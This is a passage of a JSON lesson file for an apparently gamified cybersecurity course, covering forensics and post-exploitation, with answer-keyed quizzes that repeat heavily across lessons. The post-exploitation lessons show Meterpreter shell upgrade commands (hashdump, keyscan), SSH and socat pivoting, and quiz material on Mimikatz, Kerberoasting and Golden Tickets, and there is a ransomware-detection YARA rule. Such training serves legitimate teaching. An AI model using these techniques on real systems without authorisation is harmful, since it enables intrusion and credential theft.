cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"The USN Journal records...","opts":["User logins","File system changes (creates, deletes, renames)","Network connections","Process execution"],"ans":1},{"type":"quiz","q":"Evidence integrity is verified using...","opts":["File size comparison","Cryptographic hash comparison","Visual inspection","File name matching"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"fo-docker-forensics","cat":"Forensics & IR","title":"Container Forensics","diff":3,"xp":200,"intro":"Investigate incidents inside Docker containers.","sections":[{"type":"text","content":"Investigate incidents inside Docker containers."},{"type":"code","lang":"bash","content":"# Container logs\ndocker logs container_id\n# Inspect container\ndocker inspect container_id\n# Export filesystem\ndocker export container_id > fs.tar\n# Check image layers\ndocker history --no-trunc image:latest"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"Container forensics differs from traditional by...","opts":["Being easier","Ephemeral nature of containers (evidence may be lost)","Using different tools","Being impossible"],"ans":1},{"type":"quiz","q":"Malware sandboxing means...","opts":["Deleting malware","Running it in an isolated environment to observe behavior","Encrypting it","Reverse engineering"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"The USN Journal records...","opts":["User logins","File system changes (creates, deletes, renames)","Network connections","Process execution"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"fo-cloud-forensics2","cat":"Forensics & IR","title":"AWS CloudTrail Investigation","diff":3,"xp":200,"intro":"Investigate AWS incidents using CloudTrail.","sections":[{"type":"text","content":"Investigate AWS incidents using CloudTrail."},{"type":"code","lang":"bash","content":"aws cloudtrail lookup-events --lookup-attributes AttributeKey=EventName,AttributeValue=ConsoleLogin\naws cloudtrail lookup-events --lookup-attributes AttributeKey=Username,AttributeValue=compromised-user"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"CloudTrail records...","opts":["File changes","API calls with who/what/when/where","Network packets","Container logs"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"The USN Journal records...","opts":["User logins","File system changes (creates, deletes, renames)","Network connections","Process execution"],"ans":1},{"type":"quiz","q":"Evidence integrity is verified using...","opts":["File size comparison","Cryptographic hash comparison","Visual inspection","File name matching"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"fo-yara-writing","cat":"Forensics & IR","title":"Writing Effective YARA Rules","diff":3,"xp":200,"intro":"Create YARA rules that detect malware reliably.","sections":[{"type":"text","content":"Create YARA rules that detect malware reliably."},{"type":"code","lang":"bash","content":"rule Ransomware_Note {\n  meta: description = 'Detects common ransomware notes'\n  strings:\n    $a = 'Your files have been encrypted' nocase\n    $b = 'bitcoin' nocase\n    $c = '.onion' nocase\n  condition: 2 of ($a,$b,$c)\n}"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"YARA conditions determine...","opts":["File location","When and how string matches trigger the rule","File permissions","Network traffic"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"The USN Journal records...","opts":["User logins","File system changes (creates, deletes, renames)","Network connections","Process execution"],"ans":1},{"type":"quiz","q":"Evidence integrity is verified using...","opts":["File size comparison","Cryptographic hash comparison","Visual inspection","File name matching"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"fo-timeline-analysis","cat":"Forensics & IR","title":"Timeline Analysis Techniques","diff":3,"xp":200,"intro":"Build and analyze super timelines for incident investigation.","sections":[{"type":"text","content":"Build and analyze super timelines for incident investigation."},{"type":"code","lang":"bash","content":"log2timeline.py timeline.plaso evidence.dd\npsort.py -o l2tcsv timeline.plaso -w timeline.csv\n# Focus on the incident window\npsort.py timeline.plaso 'date > \"2024-01-15\" AND date < \"2024-01-16\"'"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"A super timeline combines...","opts":["Only file timestamps","Timestamps from ALL sources into one unified view","Only event logs","Only registry"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"The USN Journal records...","opts":["User logins","File system changes (creates, deletes, renames)","Network connections","Process execution"],"ans":1},{"type":"quiz","q":"Evidence integrity is verified using...","opts":["File size comparison","Cryptographic hash comparison","Visual inspection","File name matching"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"fo-report-writing","cat":"Forensics & IR","title":"Forensic Report Writing","diff":1,"xp":75,"intro":"Document findings for legal proceedings.","sections":[{"type":"text","content":"Document findings for legal proceedings."},{"type":"code","lang":"bash","content":"# Report sections:\n# 1. Case summary and authorization\n# 2. Evidence acquisition and chain of custody\n# 3. Methodology and tools used\n# 4. Findings (factual, no opinions)\n# 5. Timeline of events\n# 6. Conclusions"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"Forensic reports must be...","opts":["Opinionated","Factual and objective with documented methodology","Brief","Verbal only"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"The USN Journal records...","opts":["User logins","File system changes (creates, deletes, renames)","Network connections","Process execution"],"ans":1},{"type":"quiz","q":"Evidence integrity is verified using...","opts":["File size comparison","Cryptographic hash comparison","Visual inspection","File name matching"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"px-shell-types","cat":"Post-Exploitation","title":"Shell Types Comparison","diff":1,"xp":50,"intro":"Reverse, bind, and web shells compared.","sections":[{"type":"text","content":"Reverse, bind, and web shells compared."},{"type":"code","lang":"bash","content":"# Reverse: target connects TO you (best for firewalls)\n# Bind: target LISTENS for you (simpler but blocked by firewalls)\n# Web: PHP/ASPX file accepting commands via HTTP (persistent)"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"Reverse shells are preferred because...","opts":["They're faster","They bypass firewalls that block inbound connections","They're encrypted","They use less bandwidth"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from other processes","Network packets","Registry keys"],"ans":1},{"type":"quiz","q":"Scheduled tasks provide persistence because...","opts":["They run in memory only","They survive reboots","They're encrypted","They use DNS"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"px-upgrade-meterpreter","cat":"Post-Exploitation","title":"Meterpreter Session Upgrade","diff":2,"xp":150,"intro":"Upgrade a basic shell to Meterpreter.","sections":[{"type":"text","content":"Upgrade a basic shell to Meterpreter."},{"type":"code","lang":"bash","content":"# From basic shell to Meterpreter\nmsfconsole\nuse post/multi/manage/shell_to_meterpreter\nset SESSION 1\nrun\n# Meterpreter features: hashdump, migrate, keyscan, port forward"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"Meterpreter provides over basic shells...","opts":["Nothing extra","hashdump, file ops, port forwarding, screenshot, keyscan","Only file transfer","Only text output"],"ans":1},{"type":"quiz","q":"BloodHound uses what to find attack paths?","opts":["Port scanning","Active Directory relationship graph","Brute force","Web crawling"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from other processes","Network packets","Registry keys"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"px-port-forwarding","cat":"Post-Exploitation","title":"Port Forwarding Techniques","diff":2,"xp":150,"intro":"Access internal services through compromised hosts.","sections":[{"type":"text","content":"Access internal services through compromised hosts."},{"type":"code","lang":"bash","content":"# SSH local port forward\nssh -L 3306:db.internal:3306 user@pivot\n# SSH remote port forward\nssh -R 4444:localhost:4444 user@pivot\n# socat\nsocat TCP-LISTEN:8080,fork TCP:internal:80"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"Local port forward makes a remote service available on...","opts":["The remote host","Your local machine (localhost)","A third party","The DNS server"],"ans":1},{"type":"quiz","q":"Scheduled tasks provide persistence because...","opts":["They run in memory only","They survive reboots","They're encrypted","They use DNS"],"ans":1},{"type":"quiz","q":"BloodHound uses what to find attack paths?","opts":["Port scanning","Active Directory relationship graph","Brute force","Web crawling"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine 